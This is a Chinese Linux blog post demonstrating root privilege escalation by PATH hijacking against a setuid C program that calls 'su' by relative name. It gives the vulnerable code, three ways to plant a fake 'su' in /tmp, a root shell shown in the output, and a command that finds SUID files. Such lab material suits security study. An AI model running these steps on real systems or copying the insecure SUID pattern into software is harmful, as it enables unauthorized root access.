Linux 使用环境变量曲向获取 root 权限

文章
林里克斯

Linux 使用环境变量曲向获取 root 权限


实验平台:CentOS Linux release 7.6.1810


1.编写一个 C 代码

# vim demo.c

#include<unistd.h>
void main() {
  setuid(0);
  setgid(0);
  system("su - user");
}

2.生成文件(这里需要 root 权限)

# gcc demo.c -o switch
# chmod u+s switch

3.修改环境变量获取

$ echo "/bin/bash" > /tmp/su
$ chmod 777 /tmp/su
$ export PATH=/tmp:$PATH
$ echo $PATH

4.cp 方法获取

$ cp /bin/sh /tmp/su
$ export PATH=/tmp:$PATH

5.ln 软连获取

$ ln -s /bin/sh /tmp/su
$ export PATH=/tmp:$PATH

6.验证

$ id
uid=1000(test) gid=1000(test) groups=1000(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ sudo -i 

[sudo] password for test: 
test is not in the sudoers file.  This incident will be reported.
$ ./switch 
# id
uid=0(root) gid=0(root) groups=0(root),1000(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

7.查询所有的 s 权限位文件或权限位大于 4000

$ find / -perm -u=s -type f 2>/dev/null

Over~

版权协议须知!

本篇文章来源于 Uambiguous ,如本文章侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意

663 0 2020-12-08


分享:
icon_mrgreen.gificon_neutral.gificon_twisted.gificon_arrow.gificon_eek.gificon_smile.gificon_confused.gificon_cool.gificon_evil.gificon_biggrin.gificon_idea.gificon_redface.gificon_razz.gificon_rolleyes.gificon_wink.gificon_cry.gificon_surprised.gificon_lol.gificon_mad.gificon_sad.gificon_exclaim.gificon_question.gif
博主卡片
林里克斯 博主大人
一个致力于Linux的运维平台
运维时间
搭建这个平台,只为分享及记载自己所遇之事和难题。

现在时间 2024-04-28

今日天气
站点统计
  • 文章总数:240篇
  • 分类总数:29个
  • 评论总数:10条
  • 本站总访问量 216735 次

@奥奥

@Wong arrhenius 牛比

@MakerFace 厉害了!